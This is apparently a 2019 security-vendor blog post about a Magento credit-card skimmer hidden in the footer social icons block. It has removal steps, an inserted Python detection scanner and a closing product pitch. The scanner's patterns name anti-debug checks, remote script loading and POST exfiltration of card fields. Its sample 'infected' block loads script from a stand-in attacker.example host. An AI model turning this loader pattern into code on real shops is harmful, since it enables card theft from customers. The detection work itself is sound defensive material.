10 Jul, 2019

Skimmer Malware in Magento

We recently uncovered a skimmer that infects websites running Magento.
We regularly help website owners clean up malware from their sites. A speedy response is important, and we work to remove threats and get the site back online as fast as possible. A quick recovery keeps the site's reputation from suffering.

Any kind of intrusion on a website is troublesome. Some do obvious damage that any visitor can see. They may redirect the browser to a malicious site serving malware or disgusting content. They may insert spam content in the form of unauthorized ads or comments. Using an iframe, they may overlay an entire remote page on the target site. Visitors will flee from the site, and it will disappear from search engine results.

The worst kind of damage may not be visible at all. A persistent threat can install itself on a site and send confidential information to a server over a long period of time. Until the breach is discovered, the intruder gathers personal information or trade secrets. Sometimes the leak goes on for weeks or months.

Once it's discovered, the site's reputation will suffer serious damage. Customers will refuse to use it. Payment processing centers may refuse to deal with it. There could be expensive legal consequences.

Every site needs a website protection strategy to minimize the risk of a breach. There's no such thing as a site that's too obscure or too unimportant to be a target. Operators of eCommerce sites need to be especially wary, whether they're little one-product shops or large enterprises.
Skimmer malware
A skimmer is an inconspicuous device installed on an ATM or another type of card reader. It captures the information when people use their cards to make purchases and withdrawals. Skimmer malware does the same thing in software. It either intercepts payment information from a legitimate purchase form or puts up a bogus payment form on the victim's site. Either way, the data, including names and credit card numbers, goes to a remote server under the intruder's control.

It isn't easy for the customer to spot the problem. The transaction goes through just as it always does. There's no noticeable effect on processing speed. The site owner sees purchases being processed without any indication of a problem. This situation can go on for a long time without anyone noticing anything wrong. But the customers eventually discover they're the victims of identity theft and fraudulent purchases.

Sites that sell items online, even if they use a third party to process credit card payments, are expected to comply with PCI security requirements. A site that is deemed negligent may be cut off from all credit card processing services. It could have to pay a fine to get back into good standing.
Magento CC stealer
The skimmer which we recently discovered infects websites running Magento. It injects JavaScript into the footer_social_icon area, which is included on every page of a typical site. This JavaScript is just the loader:
It's the part that stays on the victim's server persistently. It checks if the site is running under a debugger, as a way to avoid detection. If it isn't, it loads the payload.

The actual skimmer code is loaded from a remote site after a randomized delay. It makes heavy use of runtime string concatenation to construct the key parts of the code.
This makes it hard for humans to read the code and for malware detection software to recognize suspicious patterns. The skimmer payload is never stored on the victim's server.

The skimmer performs some suspicious actions. It asks for the customer's credit card number through the victim's site, not the payment processing site. The user then has to enter the information again on the payment site. However, many users won't realize something is wrong until after they've given away their information, if at all. The real payment processing still works properly.

Here is the decoded part of the var_$_bd55 variable:
The malware uses a POST request to send the stolen information to a server controlled by the attacker. The longer it stays on the server without being removed, the more card numbers it will collect.
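The loader traits described above (an inline script in a CMS block, a debugger check, a randomized delay before fetching a remote payload, heavy string concatenation, a POST to an outside server) can be turned into a review heuristic. The scanner below is an added example, not code from the original post or from Quttera; the weights, the regex patterns and the sample blocks are assumptions constructed for this example, and it expects rows shaped like the identifier and content columns of Magento's cms_block table.

```python
import re
from dataclasses import dataclass, field

# Heuristic indicators of a skimmer loader hidden in a Magento CMS block.
# Patterns and weights are an assumption made for this example, not a published ruleset.
INDICATORS = {
    "inline_script": (re.compile(r"<script\b", re.I), 2),
    "anti_debug":    (re.compile(r"\bdebugger\b", re.I), 3),
    "random_delay":  (re.compile(r"setTimeout\s*\(.*Math\.random", re.I | re.S), 3),
    "remote_loader": (re.compile(r"createElement\s*\(\s*['\"]script['\"]", re.I), 3),
    "exfil_post":    (re.compile(r"\.open\s*\(\s*['\"]POST['\"]|method\s*:\s*['\"]POST['\"]", re.I), 3),
    "card_fields":   (re.compile(r"cc_number|card[_-]?number|cvv|cvc", re.I), 2),
}
# Short string literals glued together with '+' is the runtime concatenation the post describes.
CONCAT = re.compile(r"""['"][^'"]{1,4}['"]\s*\+\s*(?=['"])""")

@dataclass
class Finding:
    identifier: str
    score: int = 0
    hits: list = field(default_factory=list)

def scan_block(identifier: str, content: str, concat_min: int = 4) -> Finding:
    """Score one CMS block's HTML; the caller decides what score warrants a manual look."""
    finding = Finding(identifier)
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(content):
            finding.hits.append(name)
            finding.score += weight
    joins = len(CONCAT.findall(content))
    if joins >= concat_min:
        finding.hits.append(f"string_concat_x{joins}")
        finding.score += 3
    return finding

def suspicious_blocks(rows, threshold: int = 5):
    """rows: (identifier, content) pairs as fetched from the cms_block table."""
    return [f for f in (scan_block(i, c) for i, c in rows) if f.score >= threshold]

# Constructed samples: a clean footer block and one carrying an inert stand-in for a loader.
CLEAN = '<div class="footer-social"><a href="https://twitter.com/example">Twitter</a></div>'
INFECTED = (CLEAN + "<script>var _d='doc'+'ume'+'nt',_c='cre'+'ate'+'Ele'+'ment';debugger;"
            "setTimeout(function(){var s=document.createElement('script');"
            "s.src='https://attacker.example/PLACEHOLDER.js';document.body.appendChild(s);},"
            "Math.random()*5000);</script>")
ROWS = [("footer_links", CLEAN), ("footer_social_icon", INFECTED)]

if __name__ == "__main__":
    for f in suspicious_blocks(ROWS):
        print(f"{f.identifier}: score={f.score} hits={f.hits}")
```

Legitimate blocks that embed a vendor widget will also contain an inline script, so treat the score as a triage order for manual review rather than a verdict.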
Removing the CC stealer
If you think this code is infecting your site, you can find and remove the loader by hand. In the Magento admin panel, look for and open CMS->Footer Social Icons. If the PHP code shown includes the selected text, delete it and save the changes.
Making a backup before changing any PHP code on the server is a good idea. If you delete the code incorrectly, the footer social icons block could stop working.

If this CC stealer were the only problem, it would be easy to look for it and remove it. But the list of threats to Magento sites grows constantly, and finding each one by hand requires a different search strategy. More than one threat can be present at the same time.

Trying to find all possible threats that way wouldn't leave time to do anything else. Manual removal works when you suspect a specific kind of malware, but for ongoing website security, you need a more efficient approach that covers all threats.
Protection with ThreatSign
Website protection requires a multi-layered approach. Any available software patches need to be installed soon after they become available. Accounts need strong passwords and multi-factor authentication to deter break-in attempts. A subscription to ThreatSign from Quttera provides multiple forms of protection, including:

  • Discovery and removal of malware
  • Request filtering
  • Monitoring of traffic
  • A web application firewall (WAF) to stop Magento-specific attacks
  • Checking of your domain against blacklists
  • Prompt recovery from blacklisting
A malware analysis conducts a thorough check of your site, finding and removing malware using the latest threat intelligence and analysis techniques. Ongoing monitoring ensures that any subsequent attacks are caught and stopped quickly.

Sign up for the ThreatSign plan that best suits your organization's needs and budget. It will pay for itself in greater user confidence, reduction in security incidents, and increased uptime.